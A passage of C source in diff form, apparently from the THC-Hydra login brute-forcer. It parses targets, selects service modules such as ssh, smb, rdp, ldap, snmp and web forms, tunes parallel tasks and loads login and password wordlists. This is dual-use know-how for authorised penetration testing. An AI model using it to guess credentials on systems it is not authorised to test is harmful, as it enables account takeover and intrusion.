hydra_options.passfile != NULL) + bail("You can only use -P OR -p, not both\n"); + if (hydra_options.restore) { + hydra_restore_read(); + // stuff we have to copy from the non-restore part + if (strncmp(hydra_options.service, "http-", 5) == 0) { + if (getenv("HYDRA_PROXY_HTTP") && getenv("HYDRA_PROXY")) + bail("Found HYDRA_PROXY_HTTP *and* HYDRA_PROXY environment variables - you can use only ONE for the service http-head/http-get!"); + if (getenv("HYDRA_PROXY_HTTP")) { + printf("[INFO] Using HTTP Proxy: %s\n", getenv("HYDRA_PROXY_HTTP")); + use_proxy = 1; + } + } + } else { // normal mode, aka non-restore mode + if (hydra_options.colonfile) + hydra_options.loop_mode = 0; // just to be sure + if (hydra_options.infile_ptr != NULL) { + if (optind + 2 < argc) + bail("The -M FILE option can not be used together with a host on the commandline"); + if (optind + 1 > argc) + bail("You need to define a service to attack"); + if (optind + 2 == argc) + fprintf(stderr, "[WARNING] With the -M FILE option you can not specify a server on the commandline. Lets hope you did everything right!\n"); + hydra_options.server = NULL; + hydra_options.service = argv[optind]; + if (optind + 2 == argc) + hydra_options.miscptr = argv[optind + 1]; + } else if (optind + 2 != argc && optind + 3 != argc) { + // check if targetdef follow syntax ://[:][/] or it's a syntax error + char *targetdef = argv[optind]; + char *service_pos; + + if ((targetdef != NULL) && (strstr(targetdef, "://") != NULL)) { + char *targetport_sep; + char *port_pos = NULL, *param_pos = NULL; + + service_pos = strstr(targetdef, "://"); + if ((service_pos - targetdef) == 0) + bail("could not identify service"); + if ((hydra_options.service = malloc(1 + service_pos - targetdef)) == NULL) + bail("could not alloc memory"); + strncpy(hydra_options.service, targetdef, service_pos - targetdef); + hydra_options.service[service_pos - targetdef] = '\0'; + + // check if we specify a port + if (prefer_ipv6) + targetport_sep = "]:"; + else + targetport_sep = ":"; + port_pos = strstr(service_pos + strlen("://"), targetport_sep); + param_pos = strstr(service_pos + strlen("://"), "/"); + if (param_pos != NULL && param_pos < port_pos) + port_pos = NULL; + + if (port_pos != NULL) { + *port_pos = 0; + // removing ://[ + if (port_pos - service_pos - 2 - strlen(targetport_sep) == 0) + bail("identifying server address"); + if (prefer_ipv6 && ((service_pos + 3)[0] != '[')) + bail("identifying ipv6 server address"); + if ((hydra_options.server = malloc(1 + port_pos - service_pos - 2 - strlen(targetport_sep))) == NULL) + bail("could not allocate memory"); + if (service_pos[3] == '[') + strncpy(hydra_options.server, service_pos + 4, port_pos - service_pos - 3); + else + strncpy(hydra_options.server, service_pos + 3, port_pos - service_pos - 3); + hydra_options.server[port_pos - service_pos - 3] = '\0'; + } + // check if we specify a parameter + if ((param_pos != NULL) && (port_pos == NULL)) { + if (param_pos - service_pos - 3 == 0) + bail("could not identify server address"); + if ((hydra_options.server = malloc(1 + param_pos - service_pos - 3)) == NULL) + bail("could not allocate memory"); + if (service_pos[3] == '[') { + strncpy(hydra_options.server, service_pos + 4, param_pos - service_pos - 3); + hydra_options.server[param_pos - 4 - service_pos] = '\0'; + } else { + strncpy(hydra_options.server, service_pos + 3, param_pos - service_pos - 3); + hydra_options.server[param_pos - 3 - service_pos] = '\0'; + } + if (hydra_options.server[strlen(hydra_options.server) - 1] == ']') + hydra_options.server[strlen(hydra_options.server) - 1] = 0; + } + if ((port_pos == NULL) && (param_pos == NULL)) { + if (strlen(targetdef) - strlen(hydra_options.service) - 3 == 0) + bail("could not identify server address"); + if ((hydra_options.server = malloc(1 + strlen(targetdef) - strlen(hydra_options.service) - 3)) == NULL) + bail("could not allocate memory"); + if (service_pos[3] == '[') + strcpy(hydra_options.server, service_pos + 4); + else + strcpy(hydra_options.server, service_pos + 3); + if (hydra_options.server[strlen(hydra_options.server) - 1] == ']') + hydra_options.server[strlen(hydra_options.server) - 1] = 0; + } else { + char port_temp[6] = ""; + + if (port_pos) { + // set the port + if (param_pos == NULL) { + hydra_options.port = port = atoi(port_pos + strlen(targetport_sep)); + } else { + if (param_pos - port_pos - strlen(targetport_sep) > 0) { + if (param_pos - port_pos - strlen(targetport_sep) > sizeof(port_temp) - 1) + bail("invalid port number"); + strncpy(port_temp, port_pos + strlen(targetport_sep), param_pos - port_pos - strlen(targetport_sep)); + port_temp[strlen(port_temp)] = '\0'; + hydra_options.port = port = atoi(port_temp); + } + } + } + if (param_pos) { + int size_of_miscptr = 0; + + if (strstr(hydra_options.service, "http") != NULL && strstr(hydra_options.service, "http-proxy") == NULL && param_pos[1] != '/') { + param_pos--; + } + + size_of_miscptr = strlen(param_pos); + + if (size_of_miscptr > 0) { + if ((hydra_options.miscptr = malloc(1 + size_of_miscptr)) == NULL) + bail("could not allocate memory"); + strcpy(hydra_options.miscptr, param_pos + 1); + } + } + } + if (debug) + printf("[DEBUG] opt:%d argc:%d mod:%s tgt:%s port:%d misc:%s\n", optind, argc, hydra_options.service, hydra_options.server, hydra_options.port, hydra_options.miscptr); + } else { + hydra_options.server = NULL; + hydra_options.service = NULL; + + if (modusage) + hydra_options.service = targetdef; + else + help(0); + } + } else { + hydra_options.server = argv[optind]; + cmdlinetarget = argv[optind]; + hydra_options.service = argv[optind + 1]; + if (optind + 3 == argc) + hydra_options.miscptr = argv[optind + 2]; + } + + if (strcmp(hydra_options.service, "pop3s") == 0 || strcmp(hydra_options.service, "smtps") == 0 || strcmp(hydra_options.service, "imaps") == 0 + || strcmp(hydra_options.service, "telnets") == 0 || (strncmp(hydra_options.service, "ldap", 4) == 0 && hydra_options.service[strlen(hydra_options.service) - 1] == 's')) { + hydra_options.ssl = 1; + hydra_options.service[strlen(hydra_options.service) - 1] = 0; + } + + if (getenv("HYDRA_PROXY_HTTP") || getenv("HYDRA_PROXY")) { + if (strcmp(hydra_options.service, "afp") == 0 || strcmp(hydra_options.service, "firebird") == 0 || strncmp(hydra_options.service, "mysql", 5) == 0 || + strcmp(hydra_options.service, "ncp") == 0 || strcmp(hydra_options.service, "oracle") == 0 || strcmp(hydra_options.service, "postgres") == 0 || + strncmp(hydra_options.service, "ssh", 3) == 0 || strcmp(hydra_options.service, "sshkey") == 0 || strcmp(hydra_options.service, "svn") == 0 || + strcmp(hydra_options.service, "sapr3") == 0) { + fprintf(stderr, "[WARNING] module %s does not support HYDRA_PROXY* !\n", hydra_options.service); + proxy_string = NULL; + } + } + + /* here start the services */ + + if (strcmp(hydra_options.service, "ssl") == 0 || strcmp(hydra_options.service, "www") == 0 || strcmp(hydra_options.service, "http") == 0 + || strcmp(hydra_options.service, "https") == 0) { + fprintf(stderr, "[WARNING] The service http has been replaced with http-head and http-get, using by default GET method. Same for https.\n"); + if (strcmp(hydra_options.service, "http") == 0) { + hydra_options.service = malloc(strlen("http-get") + 1); + strcpy(hydra_options.service, "http-get"); + } + if (strcmp(hydra_options.service, "https") == 0) { + hydra_options.service = malloc(strlen("https-get") + 1); + strcpy(hydra_options.service, "https-get"); + } + } + + if (strcmp(hydra_options.service, "http-form-get") == 0) + strcpy(hydra_options.service, "http-get-form"); + if (strcmp(hydra_options.service, "https-form-get") == 0) + strcpy(hydra_options.service, "https-get-form"); + if (strcmp(hydra_options.service, "http-form-post") == 0) + strcpy(hydra_options.service, "http-post-form"); + if (strcmp(hydra_options.service, "https-form-post") == 0) + strcpy(hydra_options.service, "https-post-form"); + + if (modusage == 1) + module_usage(); + + i = 0; + if (strcmp(hydra_options.service, "telnet") == 0) { + fprintf(stderr, "[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available\n"); + i = 1; + } + if (strcmp(hydra_options.service, "ftp") == 0) + i = 1; + if (strcmp(hydra_options.service, "ftps") == 0) { + fprintf(stderr, "[WARNING] you enabled ftp-SSL (auth tls) mode. If you want to use direct SSL ftp, use -S and the ftp module instead.\n"); + i = 1; + } + if (strcmp(hydra_options.service, "pop3") == 0) { + fprintf(stderr, "[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n"); + i = 1; + } + if (strcmp(hydra_options.service, "imap") == 0) { + fprintf(stderr, "[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n"); + i = 1; + } + if (strcmp(hydra_options.service, "redis") == 0) + i = 2; + if (strcmp(hydra_options.service, "asterisk") == 0) + i = 1; + if (strcmp(hydra_options.service, "vmauthd") == 0) + i = 1; + if (strcmp(hydra_options.service, "rexec") == 0) + i = 1; + if (strcmp(hydra_options.service, "rlogin") == 0) + i = 1; + if (strcmp(hydra_options.service, "rsh") == 0) + i = 3; + if (strcmp(hydra_options.service, "nntp") == 0) + i = 1; + if (strcmp(hydra_options.service, "socks5") == 0) + i = 1; + if (strcmp(hydra_options.service, "icq") == 0) { + fprintf(stderr, "[WARNING] The icq module is not working with the modern protocol version! (somebody else will need to fix this as I don't care for icq)\n"); + i = 1; + } + if (strcmp(hydra_options.service, "mysql") == 0) { + i = 1; + if (hydra_options.tasks > 4) { + fprintf(stderr, "[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)\n"); + hydra_options.tasks = 4; + } + } + if (strcmp(hydra_options.service, "mssql") == 0) + i = 1; + if ((strcmp(hydra_options.service, "oracle-listener") == 0) || (strcmp(hydra_options.service, "tns") == 0)) { + i = 2; + hydra_options.service = malloc(strlen("oracle-listener") + 1); + strcpy(hydra_options.service, "oracle-listener"); + } + if ((strcmp(hydra_options.service, "oracle-sid") == 0) || (strcmp(hydra_options.service, "sid") == 0)) { + i = 3; + hydra_options.service = malloc(strlen("oracle-sid") + 1); + strcpy(hydra_options.service, "oracle-sid"); + } +#ifdef LIBORACLE + if ((strcmp(hydra_options.service, "oracle") == 0) || (strcmp(hydra_options.service, "ora") == 0)) { + i = 1; + hydra_options.service = malloc(strlen("oracle") + 1); + strcpy(hydra_options.service, "oracle"); + } +#endif + if (strcmp(hydra_options.service, "postgres") == 0) +#ifdef LIBPOSTGRES + i = 1; +#else + bail("Compiled without LIBPOSTGRES support, module not available!"); +#endif + if (strcmp(hydra_options.service, "firebird") == 0) +#ifdef LIBFIREBIRD + i = 1; +#else + bail("Compiled without LIBFIREBIRD support, module not available!"); +#endif + if (strcmp(hydra_options.service, "afp") == 0) +#ifdef LIBAFP + i = 1; +#else + bail("Compiled without LIBAFP support, module not available!"); +#endif + if (strcmp(hydra_options.service, "svn") == 0) +#ifdef LIBSVN + i = 1; +#else + bail("Compiled without LIBSVN support, module not available!"); +#endif + if (strcmp(hydra_options.service, "ncp") == 0) +#ifdef LIBNCP + i = 1; +#else + bail("Compiled without LIBNCP support, module not available!"); +#endif + if (strcmp(hydra_options.service, "pcanywhere") == 0) + i = 1; + if (strcmp(hydra_options.service, "http-proxy") == 0) { + i = 1; + if (hydra_options.miscptr != NULL && strncmp(hydra_options.miscptr, "http://", 7) != 0) + + bail("module option must start with http://"); + } + if (strcmp(hydra_options.service, "cvs") == 0) { + i = 1; + if (hydra_options.miscptr == NULL || (strlen(hydra_options.miscptr) == 0)) { + fprintf(stderr, "[INFO] The CVS repository path wasn't passed so using /root by default\n"); + } + } + if (strcmp(hydra_options.service, "svn") == 0) { + i = 1; + if (hydra_options.miscptr == NULL || (strlen(hydra_options.miscptr) == 0)) { + fprintf(stderr, "[INFO] The SVN repository path wasn't passed so using /trunk by default\n"); + } + } + if (strcmp(hydra_options.service, "ssh") == 0 || strcmp(hydra_options.service, "sshkey") == 0) { + if (hydra_options.tasks > 8) + fprintf(stderr, "[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 or -t 8\n"); +#ifdef LIBSSH + i = 1; +#else + bail("Compiled without LIBSSH v0.4.x support, module is not available!"); +#endif + } + if (strcmp(hydra_options.service, "smtp") == 0) { + fprintf(stderr, "[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n"); + i = 1; + } + if (strcmp(hydra_options.service, "smtp-enum") == 0) + i = 1; + if (strcmp(hydra_options.service, "teamspeak") == 0) + i = 1; + if ((strcmp(hydra_options.service, "smb") == 0) || (strcmp(hydra_options.service, "smbnt") == 0)) { + if (hydra_options.tasks > 1) { + fprintf(stderr, "[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)\n"); + hydra_options.tasks = 1; + } + i = 1; + } + if ((strcmp(hydra_options.service, "smb") == 0) || (strcmp(hydra_options.service, "smbnt") == 0)) { +#ifdef LIBOPENSSL + if (hydra_options.tasks > 1) { + fprintf(stderr, "[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)\n"); + hydra_options.tasks = 1; + } + i = 1; +#endif + } + if ((strcmp(hydra_options.service, "smb") == 0) || (strcmp(hydra_options.service, "smbnt") == 0) || + (strcmp(hydra_options.service, "sip") == 0) || (strcmp(hydra_options.service, "rdp") == 0) || + (strcmp(hydra_options.service, "oracle-listener") == 0) || (strcmp(hydra_options.service, "oracle-sid") == 0)) { +#ifndef LIBOPENSSL + bail("Compiled without OPENSSL support, module not available!"); +#endif + } + if (strcmp(hydra_options.service, "pcnfs") == 0) { + i = 1; + if (port == 0) + bail("You must set the port for pcnfs with -s (run \"rpcinfo -p %s\" and look for the pcnfs v2 UDP port)"); + } + if (strcmp(hydra_options.service, "sapr3") == 0) { +#ifdef LIBSAPR3 + i = 1; + if (port == PORT_SAPR3) + bail("You must set the port for sapr3 with -s , it should lie between 3200 and 3699."); + if (port < 3200 || port > 3699) + fprintf(stderr, "[WARNING] The port is not in the range 3200 to 3399 - please ensure it is ok!\n"); + if (hydra_options.miscptr == NULL || atoi(hydra_options.miscptr) < 0 || atoi(hydra_options.miscptr) > 999 || !isdigit(hydra_options.miscptr[0])) + bail("You must set the client ID (0-999) as an additional option or via -m"); +#else + bail("Compiled without LIBSAPR3 support, module not available!"); +#endif + } + if (strcmp(hydra_options.service, "cisco") == 0) { + i = 2; + if (hydra_options.tasks > 4) + fprintf(stderr, "[WARNING] you should set the number of parallel task to 4 for cisco services.\n"); + } + if (strncmp(hydra_options.service, "snmpv", 5) == 0) { + hydra_options.service[4] = hydra_options.service[5]; + hydra_options.service[5] = 0; + } + if (strcmp(hydra_options.service, "snmp") == 0 || strcmp(hydra_options.service, "snmp1") == 0) { + hydra_options.service[4] = 0; + i = 2; + } + if (strcmp(hydra_options.service, "snmp2") == 0 || strcmp(hydra_options.service, "snmp3") == 0) { + if (hydra_options.miscptr == NULL) + hydra_options.miscptr = strdup(hydra_options.service + 4); + else { + tmpptr = malloc(strlen(hydra_options.miscptr) + 4); + strcpy(tmpptr, hydra_options.miscptr); + strcat(tmpptr, ":"); + strcat(tmpptr, hydra_options.service + 4); + hydra_options.miscptr = tmpptr; + } + hydra_options.service[4] = 0; + i = 2; + } + if (strcmp(hydra_options.service, "snmp") == 0 && hydra_options.miscptr != NULL) { + char *lptr; + + j = 1; + tmpptr = strdup(hydra_options.miscptr); + lptr = strtok(tmpptr, ":"); + while (lptr != NULL) { + i = 0; + if (strcasecmp(lptr, "1") == 0 || strcasecmp(lptr, "2") == 0 || strcasecmp(lptr, "3") == 0) { + i = 1; + j = lptr[0] - '0' + (j & 252); + } else if (strcasecmp(lptr, "READ") == 0 || strcasecmp(lptr, "WRITE") == 0 || strcasecmp(lptr, "PLAIN") == 0) + i = 1; + else if (strcasecmp(lptr, "MD5") == 0) { + i = 1; + j = 4 + (j & 51); + } else if (strcasecmp(lptr, "SHA") == 0 || strcasecmp(lptr, "SHA1") == 0) { + i = 1; + j = 8 + (j & 51); + } else if (strcasecmp(lptr, "DES") == 0) { + i = 1; + j = 16 + (j & 15); + } else if (strcasecmp(lptr, "AES") == 0) { + i = 1; + j = 32 + (j & 15); + } + if (i == 0) { + fprintf(stderr, "[ERROR] unknown parameter in module option: %s\n", lptr); + exit(-1); + } + lptr = strtok(NULL, ":"); + } + i = 2; + if ((j & 3) < 3 && j > 2) + fprintf(stderr, "[WARNING] SNMPv1 and SNMPv2 do not support hash and encryption, ignored\n"); + if ((j & 3) == 3) { + fprintf(stderr, "[WARNING] SNMPv3 is still in beta state, use at own risk and report problems\n"); + if (j >= 16) + bail("The SNMPv3 module so far only support authentication (md5/sha), not yet encryption\n"); + if (hydra_options.colonfile == NULL + && ((hydra_options.login == NULL && hydra_options.loginfile == NULL) || (hydra_options.pass == NULL && hydra_options.passfile == NULL && hydra_options.bfg == 0))) { + if (j > 3) { + fprintf(stderr, + "[ERROR] you specified SNMPv3, defined hashing/encryption but only gave one of login or password list. Either supply both logins and passwords (this is what is usually used in SNMPv3), or remove the hashing/encryption option (unusual)\n"); + exit(-1); + } + fprintf(stderr, "[WARNING] you specified SNMPv3 but gave no logins, NoAuthNoPriv is assumed. This is an unusual case, you should know what you are doing\n"); + tmpptr = malloc(strlen(hydra_options.miscptr) + 8); + strcpy(tmpptr, hydra_options.miscptr); + strcat(tmpptr, ":"); + strcat(tmpptr, "PLAIN"); + hydra_options.miscptr = tmpptr; + } else { + i = 1; // snmpv3 with login+pass mode +#ifndef LIBOPENSSL + bail("hydra was not compiled with OPENSSL support, snmpv3 can only be used on NoAuthNoPriv mode (only logins, no passwords)!"); +#endif + printf("[INFO] Using %s SNMPv3 with %s authentication and %s privacy\n", j > 16 ? "AuthPriv" : "AuthNoPriv", (j & 8) == 8 ? "SHA" : "MD5", + (j & 16) == 16 ? "DES" : (j > 16) ? "AES" : "no"); + } + } + } + if (strcmp(hydra_options.service, "sip") == 0) { + if (hydra_options.miscptr == NULL) { + if (hydra_options.server != NULL) { + hydra_options.miscptr = hydra_options.server; + i = 1; + } else { + bail("The sip module does not work with multiple servers (-M)\n"); + } + } else { + i = 1; + } + } + if (strcmp(hydra_options.service, "ldap") == 0) { + bail("Please select ldap2 or ldap3 for simple authentication or ldap3-crammd5 or ldap3-digestmd5\n"); + } + if (strcmp(hydra_options.service, "ldap2") == 0 || strcmp(hydra_options.service, "ldap3") == 0) { + i = 1; + if ((hydra_options.miscptr != NULL && hydra_options.login != NULL) + || (hydra_options.miscptr != NULL && hydra_options.loginfile != NULL) || (hydra_options.login != NULL && hydra_options.loginfile != NULL)) + bail("you may only use one of -l, -L or -m\n"); + if (hydra_options.login == NULL && hydra_options.loginfile == NULL && hydra_options.miscptr == NULL) + fprintf(stderr, "[WARNING] no DN to authenticate is defined, using DN of null (use -m, -l or -L to define DNs)\n"); + if (hydra_options.login == NULL && hydra_options.loginfile == NULL) { + i = 2; + } + } + if (strcmp(hydra_options.service, "ldap3-crammd5") == 0 || strcmp(hydra_options.service, "ldap3-digestmd5") == 0) { + i = 1; + if (hydra_options.login == NULL && hydra_options.loginfile == NULL) + bail("-l or -L option is required to specify the login\n"); + if (hydra_options.miscptr == NULL) + bail("-m option is required to specify the DN\n"); + } +// ADD NEW SERVICES HERE + if (strcmp(hydra_options.service, "s7-300") == 0) { + if (hydra_options.tasks > 8) { + fprintf(stderr, "[INFO] Reduced number of tasks to 8 (the PLC does not like more connections)\n"); + hydra_options.tasks = 8; + } + i = 2; + } + if (strcmp(hydra_options.service, "cisco-enable") == 0) { + i = 2; + if (hydra_options.login == NULL) + hydra_options.login = empty_login; + if (hydra_options.miscptr == NULL) { + fprintf(stderr, "[WARNING] You did not supply the initial support to the Cisco via -l, assuming direct console access\n"); + } + if (hydra_options.tasks > 4) + fprintf(stderr, "[WARNING] you should set the number of parallel task to 4 for cisco enable services.\n"); + } + if (strcmp(hydra_options.service, "http-proxy-urlenum") == 0) { + i = 4; + hydra_options.pass = empty_login; + if (hydra_options.miscptr == NULL) { + fprintf(stderr, "[WARNING] You did not supply proxy credentials via the optional parameter\n"); + } + if (hydra_options.bfg || hydra_options.passfile != NULL) + bail("the http-proxy-urlenum does not need the -p/-P or -x option"); + } + if (strcmp(hydra_options.service, "vnc") == 0) { + i = 2; + if (hydra_options.tasks > 4) + fprintf(stderr, "[WARNING] you should set the number of parallel task to 4 for vnc services.\n"); + } + if (strcmp(hydra_options.service, "https-head") == 0 || strcmp(hydra_options.service, "https-get") == 0) { +#ifdef LIBOPENSSL + i = 1; + hydra_options.ssl = 1; + if (strcmp(hydra_options.service, "https-head") == 0) + strcpy(hydra_options.service, "http-head"); + else + strcpy(hydra_options.service, "http-get"); +#else + bail("Compiled without SSL support, module not available"); +#endif + } + if (strcmp(hydra_options.service, "http-get") == 0 || strcmp(hydra_options.service, "http-head") == 0) { + i = 1; + if (hydra_options.miscptr == NULL) { + fprintf(stderr, "[WARNING] You must supply the web page as an additional option or via -m, default path set to /\n"); + hydra_options.miscptr = malloc(2); + hydra_options.miscptr = "/"; + } + if (*hydra_options.miscptr != '/' && strstr(hydra_options.miscptr, "://") == NULL) + bail("The web page you supplied must start with a \"/\", \"http://\" or \"https://\", e.g. \"/protected/login\""); + if (getenv("HYDRA_PROXY_HTTP") && getenv("HYDRA_PROXY")) + bail("Found HYDRA_PROXY_HTTP *and* HYDRA_PROXY environment variables - you can use only ONE for the service http-head/http-get!"); + if (getenv("HYDRA_PROXY_HTTP")) { + printf("[INFO] Using HTTP Proxy: %s\n", getenv("HYDRA_PROXY_HTTP")); + use_proxy = 1; + } + if (strcmp(hydra_options.service, "http-head") == 0) + fprintf(stderr, "[WARNING] http-head auth does not work with every server, better use http-get\n"); + } + + if (strcmp(hydra_options.service, "http-get-form") == 0 || strcmp(hydra_options.service, "http-post-form") == 0 || strcmp(hydra_options.service, "https-get-form") == 0 + || strcmp(hydra_options.service, "https-post-form") == 0) { + char bufferurl[1024], *url, *variables, *cond, *optional1; + + if (strncmp(hydra_options.service, "http-", 5) == 0) { + i = 1; + } else { // https +#ifdef LIBOPENSSL + i = 1; + hydra_options.ssl = 1; + if (strcmp(hydra_options.service, "https-post-form") == 0) + strcpy(hydra_options.service, "http-post-form"); + else + strcpy(hydra_options.service, "http-get-form"); +#else + bail("Compiled without SSL support, module not available"); +#endif + } + if (hydra_options.miscptr == NULL) { + fprintf(stderr, "[WARNING] You must supply the web page as an additional option or via -m, default path set to /\n"); + hydra_options.miscptr = malloc(2); + hydra_options.miscptr = "/"; + } + //if (*hydra_options.miscptr != '/' && strstr(hydra_options.miscptr, "://") == NULL) + // bail("The web page you supplied must start with a \"/\", \"http://\" or \"https://\", e.g. \"/protected/login\""); + if (hydra_options.miscptr[0] != '/') + bail("optional parameter must start with a '/' slash!\n"); + if (getenv("HYDRA_PROXY_HTTP") && getenv("HYDRA_PROXY")) + bail("Found HYDRA_PROXY_HTTP *and* HYDRA_PROXY environment variables - you can use only ONE for the service http-head/http-get!"); + if (getenv("HYDRA_PROXY_HTTP")) { + printf("[INFO] Using HTTP Proxy: %s\n", getenv("HYDRA_PROXY_HTTP")); + use_proxy = 1; + } + + if (strstr(hydra_options.miscptr, "\\:") != NULL) { + fprintf(stderr, "[WARNING] escape sequence \\: detected in module option, no parameter verification is performed.\n"); + } else { + sprintf(bufferurl, "%.1000s", hydra_options.miscptr); + url = strtok(bufferurl, ":"); + variables = strtok(NULL, ":"); + cond = strtok(NULL, ":"); + optional1 = strtok(NULL, "\n"); + if ((variables == NULL) || (strstr(variables, "^USER^") == NULL && strstr(variables, "^PASS^") == NULL)) { + fprintf(stderr, "[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: %s\n", variables); + exit(-1); + } + if ((url == NULL) || (cond == NULL)) { + fprintf(stderr, "[ERROR] Wrong syntax, requires three arguments separated by a colon which may not be null: %s\n", bufferurl); + exit(-1); + } + while ((optional1 = strtok(NULL, ":")) != NULL) { + if (optional1[1] != '=' && optional1[1] != ':' && optional1[1] != 0) { + fprintf(stderr, "[ERROR] Wrong syntax of optional argument: %s\n", optional1); + exit(-1); + } + switch (optional1[0]) { + case 'C': // fall through + case 'c': + if (optional1[1] != '=' || optional1[2] != '/') { + fprintf(stderr, "[ERROR] Wrong syntax of parameter C, must look like 'C=/url/of/page', not http:// etc.: %s\n", optional1); + exit(-1); + } + break; + case 'H': // fall through + case 'h': + if (optional1[1] != '=' || strtok(NULL, ":") == NULL) { + fprintf(stderr, "[ERROR] Wrong syntax of parameter H, must look like 'H=X-My-Header: MyValue', no http:// : %s\n", optional1); + exit(-1); + } + break; + default: + fprintf(stderr, "[ERROR] Unknown optional argument: %s", optional1); + } + } + } + } + + if (strcmp(hydra_options.service, "xmpp") == 0) + i = 1; + if (strcmp(hydra_options.service, "irc") == 0) + i = 1; + if (strcmp(hydra_options.service, "rdp") == 0) { + if (hydra_options.tasks > 4) + fprintf(stderr, + "[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\n"); + //if (hydra_options.tasks > 4) { + // fprintf(stderr, "[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\n"); + // hydra_options.tasks = 4; + //} + //if (conwait == 0) + // hydra_options.conwait = conwait = 1; + i = 1; + } + // ADD NEW SERVICES HERE + + if (i == 0) { + fprintf(stderr, "[ERROR] Unknown service: %s\n", hydra_options.service); + exit(-1); + } + + if (hydra_options.loop_mode && hydra_options.colonfile != NULL) + bail("The loop mode option (-u) works with all modes - except colon files (-C)\n"); + if (strncmp(hydra_options.service, "http-", strlen("http-")) != 0 && strcmp(hydra_options.service, "http-head") != 0 && getenv("HYDRA_PROXY_HTTP") != NULL) + fprintf(stderr, "[WARNING] the HYDRA_PROXY_HTTP environment variable works only with the http-head/http-get module, ignored...\n"); + if (i == 2) { + if (hydra_options.colonfile != NULL + || ((hydra_options.login != NULL || hydra_options.loginfile != NULL) && (hydra_options.pass != NULL || hydra_options.passfile != NULL || hydra_options.bfg > 0))) + bail + ("The redis, cisco, oracle-listener, s7-300, snmp and vnc modules are only using the -p or -P option, not login (-l, -L) or colon file (-C).\nUse the telnet module for cisco using \"Username:\" authentication.\n"); + if ((hydra_options.login != NULL || hydra_options.loginfile != NULL) && (hydra_options.pass == NULL || hydra_options.passfile == NULL)) { + hydra_options.pass = hydra_options.login; + hydra_options.passfile = hydra_options.loginfile; + } + hydra_options.login = empty_login; + hydra_options.loginfile = NULL; + } + if (i == 3) { + if (hydra_options.colonfile != NULL || hydra_options.bfg > 0 + || ((hydra_options.login != NULL || hydra_options.loginfile != NULL) && (hydra_options.pass != NULL || hydra_options.passfile != NULL))) + bail("The rsh, oracle-sid login is neither using the -p, -P or -x options nor colon file (-C)\n"); + if ((hydra_options.login == NULL || hydra_options.loginfile == NULL) && (hydra_options.pass != NULL || hydra_options.passfile != NULL)) { + hydra_options.login = hydra_options.pass; + hydra_options.loginfile = hydra_options.passfile; + } + hydra_options.pass = empty_login; + hydra_options.passfile = NULL; + } + if (i == 3 && hydra_options.login == NULL && hydra_options.loginfile == NULL) + bail("I need at least either the -l or -L option to know the login"); + if (i == 2 && hydra_options.pass == NULL && hydra_options.passfile == NULL && hydra_options.bfg == 0) + bail("I need at least either the -p, -P or -x option to have a password to try"); + if (i == 1 && hydra_options.login == NULL && hydra_options.loginfile == NULL && hydra_options.colonfile == NULL) + bail("I need at least either the -l, -L or -C option to know the login"); + if (hydra_options.colonfile != NULL && ((hydra_options.bfg != 0 || hydra_options.login != NULL || hydra_options.loginfile != NULL) + || (hydra_options.pass != NULL && hydra_options.passfile != NULL))) + bail("The -C option is standalone, don't use it with -l/L, -p/P or -x!"); + if ((hydra_options.bfg) + && ((hydra_options.pass != NULL) || (hydra_options.passfile != NULL) + || (hydra_options.colonfile != NULL))) + bail("The -x (password bruteforce generation option) doesn't work with -p/P, -C or -e!\n"); + if (hydra_options.try_password_reverse_login == 0 && hydra_options.try_password_same_as_login == 0 && hydra_options.try_null_password == 0 + && (i != 3 && (hydra_options.pass == NULL && hydra_options.passfile == NULL && hydra_options.colonfile == NULL)) && hydra_options.bfg == 0) { + // test if the service is smtp-enum as it could be used either with a login+pass or only a login + if (strstr(hydra_options.service, "smtp-enum") != NULL) + hydra_options.pass = empty_login; + else + bail("I need at least the -e, -p, -P or -x option to have some passwords!"); + } + if (hydra_options.tasks < 1 || hydra_options.tasks > MAXTASKS) { + fprintf(stderr, "[ERROR] Option -t needs to be a number between 1 and %d\n", MAXTASKS); + exit(-1); + } + if (hydra_options.max_use > MAXTASKS) { + fprintf(stderr, "[WARNING] reducing maximum tasks to MAXTASKS (%d)\n", MAXTASKS); + hydra_options.max_use = MAXTASKS; + } + + if (hydra_options.colonfile == NULL) { + if (hydra_options.loginfile != NULL) { + if ((lfp = fopen(hydra_options.loginfile, "r")) == NULL) + bail("File for logins not found!"); + hydra_brains.countlogin = countlines(lfp, 0); + hydra_brains.sizelogin = size_of_data; + if (hydra_brains.countlogin == 0) + bail("File for logins is empty!"); + if (hydra_brains.countlogin > MAX_LINES) { + fprintf(stderr, "[ERROR] Maximum number of logins is %d, this file has %lu entries.\n", MAX_LINES, hydra_brains.countlogin); + exit(-1); + } + if (hydra_brains.sizelogin > MAX_BYTES) { + fprintf(stderr, "[ERROR] Maximum size of the login file is %d, this file has %lu bytes.\n", MAX_BYTES, (unsigned long int) hydra_brains.sizelogin); + exit(-1); + } + login_ptr = malloc(hydra_brains.sizelogin + hydra_brains.countlogin + 8); + if (login_ptr == NULL) + bail("Could not allocate enough memory for login file data"); + memset(login_ptr, 0, hydra_brains.sizelogin + hydra_brains.countlogin + 8); + fill_mem(login_ptr, lfp, 0); + } else { + login_ptr = hydra_options.login; + hydra_brains.sizelogin = strlen(hydra_options.login) + 1; + hydra_brains.countlogin = 1; + } + if (hydra_options.passfile != NULL) { + if ((pfp = fopen(hydra_options.passfile, "r")) == NULL) + bail("File for passwords not found!"); + hydra_brains.countpass = countlines(pfp, 0); + hydra_brains.sizepass = size_of_data; + if (hydra_brains.countpass == 0) + bail("File for passwords is empty!"); + if (hydra_brains.countpass > MAX_LINES) { + fprintf(stderr, "[ERROR] Maximum number of passwords is %d, this file has %lu entries.\n", MAX_LINES, hydra_brains.countpass); + exit(-1); + } + if (hydra_brains.sizepass > MAX_BYTES) { + fprintf(stderr, "[ERROR] Maximum size of the password file is %d, this file has %lu bytes.\n", MAX_BYTES, (unsigned long int) 